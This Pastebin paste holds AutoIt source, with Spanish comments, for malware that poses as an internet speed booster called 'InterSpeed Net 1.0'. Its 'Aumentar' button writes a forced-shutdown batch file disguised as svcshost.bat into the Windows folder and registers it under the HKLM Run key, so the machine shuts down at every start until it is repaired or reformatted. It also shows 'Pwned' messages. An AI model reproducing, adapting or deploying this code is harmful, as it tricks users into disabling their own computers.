Advertisement
Guest User

Eazy

a guest
Sep 13th, 2008
1,493
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 1.16 KB | None | 0 0
  1. #cs
  2. Malware hecho por Eazy y con la ayudita de Skunk.
  3. No es gran cosa pero no podra prender la maquina hasta formatear
  4. o arreglar desde el boot.
  5. eazy@fm-team.com.ar
  6. riotstarter@fm-team.com.ar
  7. #ce
  8. ;~ Llamadas a archivos externos
  9. #include <Process.au3>
  10. #include <GUIConstants.au3>
  11. ;~ Terminamos las llamadas
  12. #Region ### START Koda GUI section ### Form=
  13. $Form1 = GUICreate("InterSpeed Net 1.0", 261, 57, 193, 115)
  14. GUISetBkColor(0xC0DCC0)
  15. $Button1 = GUICtrlCreateButton("Aumentar", 8, 16, 107, 25, 0)
  16. $Button2 = GUICtrlCreateButton("Salir", 136, 16, 107, 25, 0)
  17. GUISetState(@SW_SHOW)
  18. #EndRegion ### END Koda GUI section ###
  19. ;~ Definimos funciones
  20. Func eax()
  21.     While 1
  22. _RunDOS("echo shutdown -f -s -t 01>> %windir%\svcshost.bat")
  23. Sleep(2000)
  24. _RunDOS("Reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v svchost32 /d %windir%\svcshost.bat")
  25. _RunDOS("msg * U Has been Pwned!")
  26. _RunDOS("msg * Malware made by Eazy and Skunk")
  27. _RunDOS("shutdown -r -t 60")
  28. Exit
  29. WEnd
  30. EndFunc
  31. ;~ Terminamos las funciones
  32.  
  33. While 1
  34.     $nMsg = GUIGetMsg()
  35.     Switch $nMsg
  36.         Case $GUI_EVENT_CLOSE
  37.             Exit
  38.         Case $Button2
  39.             Exit
  40.         Case $Button1
  41.             Call("eax")
  42.     EndSwitch
  43. WEnd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement